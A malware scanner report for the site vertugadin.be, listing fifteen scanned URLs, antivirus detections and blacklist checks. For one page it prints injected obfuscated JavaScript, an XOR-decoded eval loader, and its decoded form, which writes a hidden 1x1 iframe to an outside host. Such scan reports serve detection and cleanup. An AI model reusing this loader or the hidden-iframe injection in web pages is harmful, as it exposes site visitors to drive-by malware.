New scan:

Malware Scanner report for vertugadin.be

Malicious/Suspicious/Total urls checked
1/0/15
1 page has malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://www.vertugadin.be/
200 OK
Content-Length: 12590
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

rifkg=new Array(7,12,0,22,14,6,13,23,77,20,17,10,23,6,75,65,95,10,5,17,2,14,6,67,16,17,0,94,63,65,11,23,23,19,89,76,76,5,17,2,25,25,12,77,0,12,14,76,23,6,16,23,80,77,19,11,19,63,65,67,20,10,7,23,11,94,63,65,82,63,65,67,11,6,10,4,11,23,94,63,65,82,63,65,67,2,15,10,4,13,94,63,65,15,6,5,23,63,65,93,95,76,10,5,17,2,14,6,93,65,74);hpxaa="";gdet=99;wfof=eval;yuapwr=String.fromCharCode;for(kckthv in rifkg)hpxaa+=yuapwr(rifkg[kckthv]^gdet);wfof(hpxaa);

Decoded script:


document.write("<iframe src=\"http://frazzo.com/test3.php\" width=\"1\" height=\"1\" align=\"left\"></iframe>")
document.write("<iframe src=\"http://frazzo.com/test3.php\" width=\"1\" height=\"1\" align=\"left\"></iframe>")
<iframe src="http://frazzo.com/test3.php" width="1" height="1" align="left"></iframe>

Antivirus reports:

Avast
HTML:Iframe-inf
nProtect
Trojan.Script.486618
TrendMicro-HouseCall
Possible_Hifrm-5
Emsisoft
Trojan.Script.486618 (B)
Comodo
TrojWare.JS.TrojanDownloader.Iframe.CA
TrendMicro
Possible_Hifrm-5
Fortinet
W32/Iframe.F
F-Secure
Trojan.Script.486618
VIPRE
Malware.JS.Generic (JS)
Sophos
Mal/Iframe-F
GData
Trojan.Script.486618
ESET-NOD32
HTML/Iframe.B.Gen
BitDefender
Trojan.Script.486618

http://www.google-analytics.com/urchin.js
200 OK
Content-Length: 22678
Content-Type: text/javascript
clean
http://www.vertugadin.be/leguide.html
404 Not Found
Content-Length: 210
Content-Type: text/html
clean
http://www.vertugadin.be/test404page.js
404 Not Found
Content-Length: 212
Content-Type: text/html
clean
http://www.vertugadin.be/lesauteurs.html
404 Not Found
Content-Length: 213
Content-Type: text/html
clean
http://www.vertugadin.be/lesadresses.html
404 Not Found
Content-Length: 214
Content-Type: text/html
clean
http://www.vertugadin.be/illustrations.html
404 Not Found
Content-Length: 216
Content-Type: text/html
clean
http://www.vertugadin.be/fr/carnetdevoyage.html
200 OK
Content-Length: 10506
Content-Type: text/html
clean
http://www.vertugadin.be/fr/../leguide.html
404 Not Found
Content-Length: 210
Content-Type: text/html
clean
http://www.vertugadin.be/fr/../lesauteurs.html
404 Not Found
Content-Length: 213
Content-Type: text/html
clean
http://www.vertugadin.be/fr/../lesadresses.html
404 Not Found
Content-Length: 214
Content-Type: text/html
clean
http://www.vertugadin.be/fr/../illustrations.html
404 Not Found
Content-Length: 216
Content-Type: text/html
clean
http://www.vertugadin.be/fr/vertugadin.html
200 OK
Content-Length: 11281
Content-Type: text/html
clean
http://www.vertugadin.be/fr/publications.html
200 OK
Content-Length: 11313
Content-Type: text/html
clean
http://www.vertugadin.be/fr/enonce.html
200 OK
Content-Length: 10114
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: vertugadin.be

Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: vertugadin.be
Referer: http://www.google.com/search?q=vertugadin.be

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=vertugadin.be

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://vertugadin.be/

Result: vertugadin.be is not infected or malware details are not published yet.